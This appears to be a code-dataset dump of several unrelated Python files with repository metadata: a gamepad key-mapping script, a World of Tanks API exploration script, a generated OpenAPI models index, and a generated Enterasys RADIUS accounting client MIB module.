"DEFAULT_PAGINATION_CLASS": "lego.utils.pagination.CursorPagination",
"PAGE_SIZE": 30,
"EXCEPTION_HANDLER": "lego.utils.exceptions.exception_handler",
"TEST_REQUEST_DEFAULT_FORMAT": "json",
}
| 39.173913 | 73 | 0.722531 |
9d013f5963723fe4e5bd547e456a880495fee69f | 1,489 | py | Python | keys_ps.py | Dikzamen/isaac_multiplayer | 17e32e26a205c2ec9692fa09be3afbf1bfcb74df | [
"MIT"
] | null | null | null | keys_ps.py | Dikzamen/isaac_multiplayer | 17e32e26a205c2ec9692fa09be3afbf1bfcb74df | [
"MIT"
] | null | null | null | keys_ps.py | Dikzamen/isaac_multiplayer | 17e32e26a205c2ec9692fa09be3afbf1bfcb74df | [
"MIT"
] | null | null | null | import vgamepad as vg
bt = vg.DS4_BUTTONS
special_bt = vg.DS4_SPECIAL_BUTTONS
keys_dict = {'Key.esc': bt.DS4_BUTTON_SHARE, # Join game
'Key.up': bt.DS4_BUTTON_TRIANGLE, # Shoot up
'Key.down': bt.DS4_BUTTON_CROSS, # Shoot down
'Key.left': bt.DS4_BUTTON_SQUARE, # Shoot left
'Key.right': bt.DS4_BUTTON_CIRCLE, # Shoot right
"'q'": bt.DS4_BUTTON_SHOULDER_RIGHT, # Drop item
"'e'": bt.DS4_BUTTON_SHOULDER_LEFT, # Use item
'Key.ctrl_l': bt.DS4_BUTTON_TRIGGER_RIGHT, # Drop item
'Key.space': bt.DS4_BUTTON_TRIGGER_LEFT, # Use item
}
keys_joystick = {"'w'": (1, 120), # Move up
"'a'": (0, -120), # Move left
"'s'": (1, -120), # Move down
"'d'": (0, 120), # Move right
}
keys_special = {
'Key.tab': special_bt.DS4_SPECIAL_BUTTON_TOUCHPAD
}
keys_triggers = (
"'q'", # Drop item
"'e'" # Use item
)
def press_buttons(gamepad, all_keys):
    """Apply the currently held keyboard keys to the virtual DS4 gamepad.

    Movement keys shift the left joystick away from its neutral position
    (128, 128); every other mapped key presses its DS4 button.
    """
    axes = [128, 128]
    for key, (axis, delta) in keys_joystick.items():
        if key in all_keys:
            axes[axis] += delta
    gamepad.left_joystick(*axes)
    # Press each DS4 button whose keyboard key is currently held.
    for pressed in all_keys:
        button = keys_dict.get(pressed)
        if button is not None:
            gamepad.press_button(button)
def reset_buttons(gamepad):
    """Release every mapped DS4 button and return both triggers to zero."""
    for mapped_key in keys_dict:
        gamepad.release_button(keys_dict[mapped_key])
    gamepad.left_trigger(0)
    gamepad.right_trigger(0)
| 30.387755 | 68 | 0.571525 |
629c5648013cac0153717750244a4413ec638dc9 | 1,736 | py | Python | first_look_at_the_data_structure.py | stephenmm/wot_vehicle_explorer | de581ca8fa6d2edbf80efaea56258cc8d8a986a8 | [
"MIT"
] | 1 | 2017-01-30T14:59:25.000Z | 2017-01-30T14:59:25.000Z | first_look_at_the_data_structure.py | stephenmm/wot_vehicle_explorer | de581ca8fa6d2edbf80efaea56258cc8d8a986a8 | [
"MIT"
] | null | null | null | first_look_at_the_data_structure.py | stephenmm/wot_vehicle_explorer | de581ca8fa6d2edbf80efaea56258cc8d8a986a8 | [
"MIT"
] | null | null | null | #!/tools/common/linux/python/3.5.0/bin/python3
# originially run with python 2.6.6
# Using the API from https://developers.wargaming.net/reference/
# Acquired the original data set like this:
# curl 'https://api.worldoftanks.com/wot/encyclopedia/vehicles/?application_id=demo' | python -m json.tool > wot_api_vehicles.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/info/?application_id=demo' | python -m json.tool > wot_api_info.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/arenas/?application_id=demo' | python -m json.tool > wot_api_arenas.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/provisions/?application_id=demo' | python -m json.tool > wot_api_provisions.json
# curl 'https://api.worldoftanks.com/wot/encyclopedia/modules/?application_id=demo&nation=france&type=vehicleRadio' | python -m json.tool > wot_api_modules-france-vehicleRadio.json
# Where the module type can be:
module_types = ['vehicleRadio', 'vehicleEngine', 'vehicleGun', 'vehicleChassis', 'vehicleTurret']
# And the nations can be:
nation_types = ['france', 'germany', 'uk', 'usa', 'ussr', 'china', 'japan', 'czech']
tank_types = ['heavyTank', 'mediumTank', 'lightTank']
import os, sys, shlex, json, re
from pprint import pprint
with open('wot_api_vehicles.json') as json_file:
json = json.load(json_file)
print( type(json) )
print( json.keys() )
wot_veh_dat = json.get('data')
print( wot_veh_dat.keys() )
for veh_id, veh_dat in wot_veh_dat.items():
if veh_dat['type'] not in tank_types:
tank_types.append( veh_dat['type'] )
wot_veh_dat_6721 = wot_veh_dat.get('6721')
print( wot_veh_dat_6721.keys() )
print( wot_veh_dat_6721['guns'] )
pprint( wot_veh_dat_6721 )
print( tank_types )
| 45.684211 | 182 | 0.738479 |
8f468cf4e464e56fbc081b39c9457e0d8ece03cd | 1,861 | py | Python | end_to_end_tests/golden-record/my_test_api_client/models/__init__.py | christhekeele/openapi-python-client | b7193165815419b9a0b4f05032a2a091bfc5ebfe | [
"MIT"
] | null | null | null | end_to_end_tests/golden-record/my_test_api_client/models/__init__.py | christhekeele/openapi-python-client | b7193165815419b9a0b4f05032a2a091bfc5ebfe | [
"MIT"
] | 19 | 2021-05-10T10:33:46.000Z | 2022-02-14T03:14:59.000Z | end_to_end_tests/golden-record/my_test_api_client/models/__init__.py | christhekeele/openapi-python-client | b7193165815419b9a0b4f05032a2a091bfc5ebfe | [
"MIT"
] | null | null | null | """ Contains all the data models used in inputs/outputs """
from .a_model import AModel
from .all_of_sub_model import AllOfSubModel
from .an_enum import AnEnum
from .an_int_enum import AnIntEnum
from .another_all_of_sub_model import AnotherAllOfSubModel
from .body_upload_file_tests_upload_post import BodyUploadFileTestsUploadPost
from .different_enum import DifferentEnum
from .free_form_model import FreeFormModel
from .http_validation_error import HTTPValidationError
from .model_from_all_of import ModelFromAllOf
from .model_name import ModelName
from .model_with_additional_properties_inlined import ModelWithAdditionalPropertiesInlined
from .model_with_additional_properties_inlined_additional_property import (
ModelWithAdditionalPropertiesInlinedAdditionalProperty,
)
from .model_with_additional_properties_refed import ModelWithAdditionalPropertiesRefed
from .model_with_any_json_properties import ModelWithAnyJsonProperties
from .model_with_any_json_properties_additional_property_type0 import ModelWithAnyJsonPropertiesAdditionalPropertyType0
from .model_with_primitive_additional_properties import ModelWithPrimitiveAdditionalProperties
from .model_with_primitive_additional_properties_a_date_holder import ModelWithPrimitiveAdditionalPropertiesADateHolder
from .model_with_property_ref import ModelWithPropertyRef
from .model_with_union_property import ModelWithUnionProperty
from .model_with_union_property_inlined import ModelWithUnionPropertyInlined
from .model_with_union_property_inlined_fruit_type0 import ModelWithUnionPropertyInlinedFruitType0
from .model_with_union_property_inlined_fruit_type1 import ModelWithUnionPropertyInlinedFruitType1
from .test_inline_objects_json_body import TestInlineObjectsJsonBody
from .test_inline_objects_response_200 import TestInlineObjectsResponse_200
from .validation_error import ValidationError
| 60.032258 | 119 | 0.915637 |
7920fb038e6b7bdc4255b762c822d701baed5a5e | 24,455 | py | Python | pysnmp-with-texts/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:04:26 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint")
etsysModules, = mibBuilder.importSymbols("ENTERASYS-MIB-NAMES", "etsysModules")
InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, iso, Bits, ObjectIdentity, Unsigned32, IpAddress, MibIdentifier, NotificationType, Counter32, Integer32, TimeTicks, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "iso", "Bits", "ObjectIdentity", "Unsigned32", "IpAddress", "MibIdentifier", "NotificationType", "Counter32", "Integer32", "TimeTicks", "Gauge32")
RowStatus, DisplayString, TruthValue, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "DisplayString", "TruthValue", "TextualConvention")
etsysRadiusAcctClientMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27))
etsysRadiusAcctClientMIB.setRevisions(('2009-08-07 15:48', '2004-11-12 15:23', '2004-09-09 14:37', '2004-08-30 15:55', '2004-08-25 15:03', '2002-09-13 19:30',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setRevisionsDescriptions(('Added the etsysRadiusAcctClientServerUpdateInterval and etsysRadiusAcctClientServerIntervalMinimum objects for the ability to override the system wide parameters on per server basis.', 'Removed the UNITS clause from the etsysRadiusAcctClientServerRetries object.', 'Added UNITS clauses to a number of objects that are expressed in seconds, and DEFVAL clauses for the etsysRadiusAcctClientUpdateInterval and etsysRadiusAcctClientIntervalMinimum objects.', 'In the columnar objects in etsysRadiusAcctClientServerTable, changed the MAX-ACCESS clauses of the read-write objects to read-create, added DEFVAL clauses to a number of the objects, and modified the DESCRIPTION clause for the RowStatus object to resolve a conflict between the syntax and the description. Deprecated the etsysRadiusAcctClientServerClearTime object. Changed a number of objects with SYNTAX clauses of INTEGER to Integer32.', 'Changed etsysRadiusClientMIBCompliance to etsysRadiusAcctClientMIBCompliance due to a conflict with the etsysRadiusAcctClientMIB.', 'The Initial version of this MIB module.',))
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setLastUpdated('200908071548Z')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setOrganization('Enterasys Networks')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setContactInfo('Postal: Enterasys Networks 50 Minuteman Rd. Andover, MA 01810-1008 USA Phone: +1 978 684 1000 E-mail: support@enterasys.com WWW: http://www.enterasys.com')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setDescription("This MIB module defines a portion of the SNMP enterprise MIBs under Enterasys Networks' enterprise OID pertaining to the client side of the Remote Access Dialin User Service (RADIUS) Accounting protocol (RFC2866). This MIB provides read-write access to configuration objects not provided in the standard RADIUS Accounting Client MIB (RFC2620). However, the write capability must only be supported for SNMPv3, or other SNMP versions with adequately strong security. Security concerns include Object ID verification, source address verification and timeliness verification.")
etsysRadiusAcctClientMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1))
etsysRadiusAcctClientEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysRadiusAcctClientEnable.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientEnable.setDescription('This object indicates whether or not RADIUS Accounting is enabled or disabled. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientUpdateInterval = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)).clone(1800)).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysRadiusAcctClientUpdateInterval.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientUpdateInterval.setDescription('This indicates how many seconds elapse between accounting interim updates. This parameter value is maintained across system reboots. A value of zero means no Interim Updates. If the value is less than etsysRadiusAcctClientIntervalMinimum, the etsysRadiusAcctClientIntervalMinimum value will be used for the update interval time. If RADIUS Accounting is not enabled, this object is ignored. Note that Accounting Interim Updates are not issued by the RADIUS Accounting Client, unless so requested by the RADIUS Server in an Access Accept packet.')
etsysRadiusAcctClientIntervalMinimum = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(60, 2147483647)).clone(600)).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysRadiusAcctClientIntervalMinimum.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientIntervalMinimum.setDescription('This indicates the minimum value in seconds between accounting interim updates supported by the managed entity. This parameter value is maintained across system reboots. If RADIUS Accounting is not enabled, this object is ignored.')
etsysRadiusAcctClientServerTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4), )
if mibBuilder.loadTexts: etsysRadiusAcctClientServerTable.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerTable.setDescription('The (conceptual) table listing the RADIUS Accounting servers.')
etsysRadiusAcctClientServerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1), ).setIndexNames((0, "ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerIndex"))
if mibBuilder.loadTexts: etsysRadiusAcctClientServerEntry.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerEntry.setDescription('An entry (conceptual row) representing a RADIUS Accounting server with which the client shares a secret. If RADIUS Accounting is not enabled, this table is ignored. All created conceptual rows are non-volatile and as such must be maintained upon restart of the agent.')
etsysRadiusAcctClientServerIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647)))
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIndex.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIndex.setDescription('A number uniquely identifying each conceptual row in the etsysRadiusAcctClientServerTable. In the event of an agent restart, the same value of etsysRadiusAcctClientServerIndex must be used to identify each conceptual row in etsysRadiusAcctClientServerTable as was used prior to the restart.')
etsysRadiusAcctClientServerAddressType = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 2), InetAddressType().clone('ipv4')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddressType.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddressType.setDescription('The type of Internet address by which the RADIUS Accounting server is reachable.')
etsysRadiusAcctClientServerAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 3), InetAddress().subtype(subtypeSpec=ValueSizeConstraint(1, 64))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddress.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddress.setDescription('The Internet address for the RADIUS Accounting server. Note that implementations must limit themselves to a single entry in this table per reachable server. The etsysRadiusAcctClientServerAddress may not be empty due to the SIZE restriction. Also the size of a DNS name is limited to 64 characters. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerPortNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(1813)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerPortNumber.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerPortNumber.setDescription('The UDP port number (1-65535) the client is using to send requests to this server. The officially assigned port number for RADIUS Accounting is 1813. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerSecret = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecret.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecret.setDescription("This object is the secret shared between the RADIUS Accounting server and RADIUS client. This parameter value is maintained across system reboots. While the 'official' MAX-ACCESS for this object is read-create, all security-conscious implementations will 'lie' on a read, and return a null-string, or something else that is fairly innocuous. The ability to read back passwords and secret encryption keys is generally a Bad Thing (tm).")
etsysRadiusAcctClientServerSecretEntered = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecretEntered.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecretEntered.setDescription('This indicates the existence of a shared secret.')
etsysRadiusAcctClientServerRetryTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 10)).clone(5)).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetryTimeout.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetryTimeout.setDescription('The number of seconds to wait for a RADIUS Accounting Server to respond to a request. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 20)).clone(2)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetries.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetries.setDescription('The number of times to resend an accounting packet if a RADIUS Accounting Server does not respond to a request. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerClearTime = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerClearTime.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerClearTime.setDescription('On a read, this value indicates the number of seconds since the counters, as defined in the IETF standard RADIUS Accounting Client MIB (RFC2618), were cleared. On a write, the client counters will be cleared and the clear time will be set to zero.')
etsysRadiusAcctClientServerStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 10), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerStatus.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerStatus.setDescription("Lets users create and delete RADIUS Accounting server entries on systems that support this capability. Rules 1. When creating a RADIUS Accounting Client, it is up to the management station to determine a suitable etsysRadiusAcctClientServerIndex. To facilitate interoperability, agents should not put any restrictions on the etsysRadiusAcctClientServerIndex beyond the obvious ones that it be valid and unused. 2. Before a new row can become 'active', values must be supplied for the columnar objects etsysRadiusAcctClientClientServerAddress, and etsysRadiusAcctClientServerSecret. 3. The value of etsysRadiusAcctClientServerStatus must be set to 'notInService' in order to modify a writable object in the same conceptual row. 4. etsysRadiusAcctClientServer entries whose status is 'notReady' or 'notInService' will not be used for Accounting.")
etsysRadiusAcctClientServerUpdateInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(-1, -1), ValueRangeConstraint(0, 2147483647), )).clone(-1)).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerUpdateInterval.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerUpdateInterval.setDescription('This indicates how many seconds elapse between accounting interim updates from the client to this RADIUS server. This parameter value is maintained across system reboots. A value of zero means no Interim Updates. If the value is less than etsysRadiusAcctClientServerIntervalMinimum, the etsysRadiusAcctClientServerIntervalMinimum value will be used for the update interval time. If RADIUS Accounting is not enabled, this object is ignored. Note that Accounting Interim Updates are not issued by the RADIUS Accounting Client, unless so requested by the RADIUS Server in an Access Accept packet. A value of -1 indicates that this object is not configured and this device will use the value configured in etsysRadiusAcctClientUpdateInterval for the minimum value in seconds between accounting interim updates for this RADIUS server.')
etsysRadiusAcctClientServerIntervalMinimum = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(-1, -1), ValueRangeConstraint(60, 2147483647), )).clone(-1)).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIntervalMinimum.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIntervalMinimum.setDescription('This indicates the minimum value in seconds between accounting interim updates supported by the managed entity for this RADIUS server. This parameter value is maintained across system reboots. If RADIUS Accounting is not enabled, this object is ignored. A value of -1 indicates that this object is not configured and this device will use the value configured in etsysRadiusAcctClientIntervalMinimum for the minimum value in seconds between accounting interim updates for this RADIUS server.')
etsysRadiusAcctClientMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2))
etsysRadiusAcctClientMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1))
etsysRadiusAcctClientMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2))
etsysRadiusAcctClientMIBGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2, 1)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientEnable"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientUpdateInterval"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddressType"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddress"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerPortNumber"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecret"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecretEntered"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetryTimeout"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetries"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerClearTime"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBGroup = etsysRadiusAcctClientMIBGroup.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBGroup.setDescription('The basic collection of objects providing a proprietary extension to the standard RADIUS Client MIB. This MIB provides read-write access to configuration objects not provided in the standard RADIUS Accounting Client MIB (RFC2618). However, the write capability must only be supported for SNMPv3, or other SNMP versions with adequately strong security.')
etsysRadiusAcctClientMIBGroupV2 = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2, 2)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientEnable"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientUpdateInterval"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddressType"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddress"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerPortNumber"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecret"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecretEntered"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetryTimeout"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetries"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBGroupV2 = etsysRadiusAcctClientMIBGroupV2.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBGroupV2.setDescription('The basic collection of objects providing a proprietary extension to the standard RADIUS Client MIB. etsysRadiusAcctClientServerClearTime was deprecated in this group.')
etsysRadiusAcctClientMIBGroupV3 = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2, 3)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientEnable"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientUpdateInterval"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddressType"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddress"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerPortNumber"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecret"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecretEntered"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetryTimeout"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetries"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerStatus"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerUpdateInterval"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBGroupV3 = etsysRadiusAcctClientMIBGroupV3.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBGroupV3.setDescription('The basic collection of objects providing a proprietary extension to the standard RADIUS Client MIB. etsysRadiusAcctClientServerClearTime was deprecated in this group.')
etsysRadiusAcctClientMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1, 2)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientMIBGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBCompliance = etsysRadiusAcctClientMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBCompliance.setDescription('The compliance statement for Accounting clients implementing the RADIUS Accounting Client MIB.')
etsysRadiusAcctClientMIBComplianceV2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1, 3)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientMIBGroupV2"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBComplianceV2 = etsysRadiusAcctClientMIBComplianceV2.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBComplianceV2.setDescription('The compliance statement for Accounting clients implementing the RADIUS Accounting Client MIB.')
